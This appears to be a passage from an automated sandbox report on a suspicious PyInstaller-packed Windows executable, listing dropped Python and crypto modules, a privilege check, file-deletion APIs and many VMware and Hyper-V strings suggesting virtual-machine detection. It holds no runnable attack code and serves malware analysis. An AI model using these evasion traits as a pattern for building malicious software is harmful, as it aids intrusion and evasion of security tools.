        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF288816 sgdt fword ptr [rax]1_2_00007FFDFF288816
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\_socket.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\_bz2.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_SHA384.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\_overlapped.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_des.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_MD5.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_ofb.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\cryptography\hazmat\bindings\_rust.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\python312.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey\_ed448.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_ctr.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_ghash_clmul.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_cfb.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_BLAKE2s.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_aesni.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey\_curve448.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\_multiprocessing.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-file-l1-2-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey\_ed25519.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_ocb.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\_queue.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_aes.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\unicodedata.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_keccak.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey\_ec_ws.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\python3.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_Salsa20.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey\_curve25519.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-file-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\_lzma.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_BLAKE2b.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\_ctypes.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_SHA512.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-string-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_MD2.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\_ssl.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_SHA1.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\_asyncio.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_chacha20.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Math\_modexp.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_MD4.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\_hashlib.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-console-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-file-l2-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_ARC4.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_SHA224.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\_cffi_backend.cp312-win_amd64.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\pyexpat.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_RIPEMD160.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Util\_strxor.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_ecb.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_ghash_portable.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\_wmi.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\_decimal.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_SHA256.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Util\_cpuid_c.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-util-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_arc2.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Protocol\_scrypt.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_des3.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\bcrypt\_bcrypt.cp312-win_amd64.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_poly1305.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_cast.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\select.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_cbc.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17873
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeAPI coverage: 0.6 %
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF602998300 FindFirstFileExW,FindClose,0_2_00007FF602998300
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF602997900 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF602997900
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029B05F4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6029B05F4
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FF602998300 FindFirstFileExW,FindClose,1_2_00007FF602998300
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FF602997900 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF602997900
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FF6029B05F4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF6029B05F4
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0079A1B0 FindFirstFileExW,FindClose,FindNextFileW,1_2_00007FFE0079A1B0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0079A018 FindFirstFileExA,FindClose,FindNextFileA,1_2_00007FFE0079A018
        Source: C:\Windows\System32\WerFault.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Jump to behavior
        Source: C:\Windows\System32\WerFault.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
        Source: C:\Windows\System32\WerFault.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Windows\System32\WerFault.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\Jump to behavior
        Source: C:\Windows\System32\WerFault.exeFile opened: C:\Users\user\Jump to behavior
        Source: C:\Windows\System32\WerFault.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI56402\Jump to behavior
        Source: DChOtFdp9T.exe, 00000000.00000003.1689611725.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp, cacert.pem.0.drBinary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
        Source: Amcache.hve.4.drBinary or memory string: VMware
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW\n',
        Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
        Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
        Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
        Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
        Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
        Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
        Source: DChOtFdp9T.exe, 00000001.00000002.1872730547.0000017809F50000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1874160118.000001780B2FF000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1714766662.000001780A063000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
        Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
        Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: cacert.pem.0.drBinary or memory string: zJVSk/BwJVmcIGfE7vmLV2H0knZ9P4SNVbfo5azV8fUZVqZa+5Acr5Pr5RzUZ5dd
        Source: Amcache.hve.4.drBinary or memory string: vmci.sys
        Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
        Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
        Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
        Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.4.drBinary or memory string: VMware20,1
        Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
        Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
        Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
        Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
        Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
        Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
        Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
        Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
        Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
        Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029A9494 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6029A9494
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029B2200 GetProcessHeap,0_2_00007FF6029B2200
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF60299C37C SetUnhandledExceptionFilter,0_2_00007FF60299C37C
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029A9494 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6029A9494
